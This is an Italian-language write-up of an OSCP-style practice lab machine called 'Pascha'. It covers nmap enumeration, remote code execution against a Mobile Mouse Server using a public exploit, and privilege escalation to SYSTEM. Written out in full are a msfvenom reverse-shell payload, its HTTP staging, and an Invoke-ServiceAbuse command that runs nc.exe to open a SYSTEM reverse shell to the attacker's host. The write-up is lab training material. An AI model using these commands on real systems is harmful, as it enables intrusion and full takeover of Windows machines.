Pascha
Challenge 6 - Pascha
Target
- name:
pascha.oscp.exam - ip:
192.168.143.155
Inserisco 192.168.143.155 pascha.oscp.exam nel file /etc/hosts
Enumerazione Esterna
Porte
-
Porte aperte:
PORT SERVICE VERSION 80/tcp http Microsoft IIS httpd 10.0 7680/tcp pando-pub 9099/tcp unknown 9999/tcp abyss 35913/tcp unknown 
Bash┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha] └─$ sudo nmap -sS -p- pascha.oscp.exam | tee nmap_ss.txt Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 14:38 CET Nmap scan report for pascha.oscp.exam (192.168.143.155) Host is up (0.059s latency). Not shown: 65530 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 7680/tcp open pando-pub 9099/tcp open unknown 9999/tcp open abyss 35913/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 153.73 seconds
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ sudo nmap -sV -p80,7680,9099,9999,35913 pascha.oscp.exam | tee nmap_sv.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 14:43 CET
Nmap scan report for pascha.oscp.exam (192.168.143.155)
Host is up (0.054s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
7680/tcp open pando-pub?
9099/tcp open unknown
9999/tcp open abyss?
35913/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9099-TCP:V=7.94SVN%I=7%D=11/30%Time=674B168B%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,1A2,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mo
SF:use\x20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\
SF:x20321\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewpo
SF:rt\"\x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BO
SF:DY\x20BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,s
SF:ans-serif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"
SF:\x20>The\x20server\x20running\x20on\x20\"OSCP\"\x20was\x20able\x20to\x2
SF:0receive\x20your\x20request\.</p></BODY></HTML>\r\n")%r(FourOhFourReque
SF:st,1A2,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x20Ser
SF:ver\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x20321\r\n
SF:\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"\x20co
SF:ntent=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x20BGCO
SF:LOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-serif;
SF:\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20>The\x
SF:20server\x20running\x20on\x20\"OSCP\"\x20was\x20able\x20to\x20receive\x
SF:20your\x20request\.</p></BODY></HTML>\r\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 177.10 seconds
nmap Vuln
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ sudo nmap -sV -p80,7680,9099,9999,35913 --script="vuln" pascha.oscp.exam
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 15:36 CET
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for pascha.oscp.exam (192.168.143.155)
Host is up (0.068s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-vuln-wnr1000-creds: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
7680/tcp filtered pando-pub
9099/tcp open unknown
| fingerprint-strings:
| JavaRMI, NULL:
| HTTP/1.0 200 OK
| Server: Mobile Mouse Server
| Content-Type: text/html
| Content-Length: 321
| <HTML><HEAD><TITLE>Success!</TITLE><meta name="viewport" content="width=device-width,user-scalable=no" /></HEAD><BODY BGCOLOR=#000000><br><br><p style="font:12pt arial,geneva,sans-serif; text-align:center; color:green; font-weight:bold;" >The server running on "OSCP" was able to receive your request.</p></BODY></HTML>
| HTTP/1.0 200 OK
| Server: Mobile Mouse Server
| Content-Type: text/html
| Content-Length: 321
| <HTML><HEAD><TITLE>Success!</TITLE><meta name="viewport" content="width=device-width,user-scalable=no" /></HEAD><BODY BGCOLOR=#000000><br><br><p style="font:12pt arial,geneva,sans-serif; text-align:center; color:green; font-weight:bold;" >The server running on "OSCP" was able to receive your request.</p></BODY></HTML>
| HTTP/1.0 200 OK
| Server: Mobile Mouse Server
|_ Content-Type: te
9999/tcp open abyss?
35913/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9099-TCP:V=7.94SVN%I=7%D=11/30%Time=674B2330%P=x86_64-pc-linux-gnu%
SF:r(NULL,1054,"HTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x
SF:20Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x2032
SF:1\r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x2
SF:0BGCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-s
SF:erif;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20>
SF:The\x20server\x20running\x20on\x20\"OSCP\"\x20was\x20able\x20to\x20rece
SF:ive\x20your\x20request\.</p></BODY></HTML>\r\nHTTP/1\.0\x20200\x20OK\x2
SF:0\r\nServer:\x20Mobile\x20Mouse\x20Server\x20\r\nContent-Type:\x20text/
SF:html\x20\r\nContent-Length:\x20321\r\n\r\n<HTML><HEAD><TITLE>Success!</
SF:TITLE><meta\x20name=\"viewport\"\x20content=\"width=device-width,user-s
SF:calable=no\"\x20/></HEAD><BODY\x20BGCOLOR=#000000><br><br><p\x20style=\
SF:"font:12pt\x20arial,geneva,sans-serif;\x20text-align:center;\x20color:g
SF:reen;\x20font-weight:bold;\"\x20>The\x20server\x20running\x20on\x20\"OS
SF:CP\"\x20was\x20able\x20to\x20receive\x20your\x20request\.</p></BODY></H
SF:TML>\r\nHTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x20Ser
SF:ver\x20\r\nContent-Type:\x20te")%r(JavaRMI,10B5,"HTTP/1\.0\x20200\x20OK
SF:\x20\r\nServer:\x20Mobile\x20Mouse\x20Server\x20\r\nContent-Type:\x20te
SF:xt/html\x20\r\nContent-Length:\x20321\r\n\r\n<HTML><HEAD><TITLE>Success
SF:!</TITLE><meta\x20name=\"viewport\"\x20content=\"width=device-width,use
SF:r-scalable=no\"\x20/></HEAD><BODY\x20BGCOLOR=#000000><br><br><p\x20styl
SF:e=\"font:12pt\x20arial,geneva,sans-serif;\x20text-align:center;\x20colo
SF:r:green;\x20font-weight:bold;\"\x20>The\x20server\x20running\x20on\x20\
SF:"OSCP\"\x20was\x20able\x20to\x20receive\x20your\x20request\.</p></BODY>
SF:</HTML>\r\nHTTP/1\.0\x20200\x20OK\x20\r\nServer:\x20Mobile\x20Mouse\x20
SF:Server\x20\r\nContent-Type:\x20text/html\x20\r\nContent-Length:\x20321\
SF:r\n\r\n<HTML><HEAD><TITLE>Success!</TITLE><meta\x20name=\"viewport\"\x2
SF:0content=\"width=device-width,user-scalable=no\"\x20/></HEAD><BODY\x20B
SF:GCOLOR=#000000><br><br><p\x20style=\"font:12pt\x20arial,geneva,sans-ser
SF:if;\x20text-align:center;\x20color:green;\x20font-weight:bold;\"\x20>Th
SF:e\x20server\x20running\x20on\x20\"OSCP\"\x20was\x20able\x20to\x20receiv
SF:e\x20your\x20request\.</p></BODY></HTML>\r\nHTTP/1\.0\x20200\x20OK\x20\
SF:r\nServer:\x20Mobile\x20Mouse\x20Server\x20\r\nContent-Type:\x20te");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 343.54 seconds
http
Porta 80
- Server IIS sulla porta
80: http://pascha.oscp.exam/
Porta 9099
- Sulla porta
9099:
Exploit
Remote Code Execution (RCE)
Per accedere alla macchina ho sfruttato l'exploit messo a disposizione da lof1sec su Github: https://github.com/lof1sec/mobile_mouse_rce/tree/main
L'exploit prevede il caricamento di un file da far eseguire. Per questo scopo creo il payload con msfvenom:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.211 LPORT=9999 -f exe -o reverse9999.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse9999.exe
Apro un listener in ascolto uslla porta 9999:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ nc -nvlp 9999
listening on [any] 9999 ...
E un webserver nella cartella dove ho generato il payload:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
A questo punto eseguo l'exploit:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ python3 cve.py --target pascha.oscp.exam --file reverse9999.exe --lhost 192.168.45.211
Executing The Command Shell...
Triggering the eXe!
l00kup your listener!
Il payload viene prelevato dalla mia macchina:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
192.168.143.155 - - [30/Nov/2024 16:26:09] "GET /reverse9999.exe HTTP/1.1" 200 -
Viene aperta la reverse shell sulla porta 9999:
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ nc -nvlp 9999
listening on [any] 9999 ...
connect to [192.168.45.211] from (UNKNOWN) [192.168.143.155] 51010
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\Temp>whoami
whoami
oscp\tim
E infine cattura la local flag.txt:
Privilege Escalation
Enumerazione Interna
- Verifico l'utente e privilegi con
whoamiewhoami /priv
Bash
PS C:\windows\temp\wintools> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
- Usando
curl, carico dentro la macchinawinPEASePowerUp.ps1tramite un webserver aperto sulla mia macchina con
Post Exploitation
- Apro
powershellconpowershell -ep bypasse importo il moduloPoweUp.ps1conImport-Module .\PowerUp.ps1 -
Verifico quali servizi sono modificabili:
-
Apro un lister in ascolto sulla mia macchina sulla porta
4455
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
- Utilizzo
Invoke-ServiceAbuseper eseguire una reverse shell comeSYSTEM:
Bash
PS C:\windows\temp\wintools> Invoke-ServiceAbuse -Name GPGOrchestrator -Command "C:\windows\temp\wintools\nc.exe 192.168.45.211 4455 -e cmd"
Invoke-ServiceAbuse -Name GPGOrchestrator -Command "C:\windows\temp\wintools\nc.exe 192.168.45.211 4455 -e cmd"
ServiceAbused Command
------------- -------
GPGOrchestrator C:\windows\temp\wintools\nc.exe 192.168.45.211 4455 -e cmd
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_6_oscp_C/Pascha]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.211] from (UNKNOWN) [192.168.143.155] 59214
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
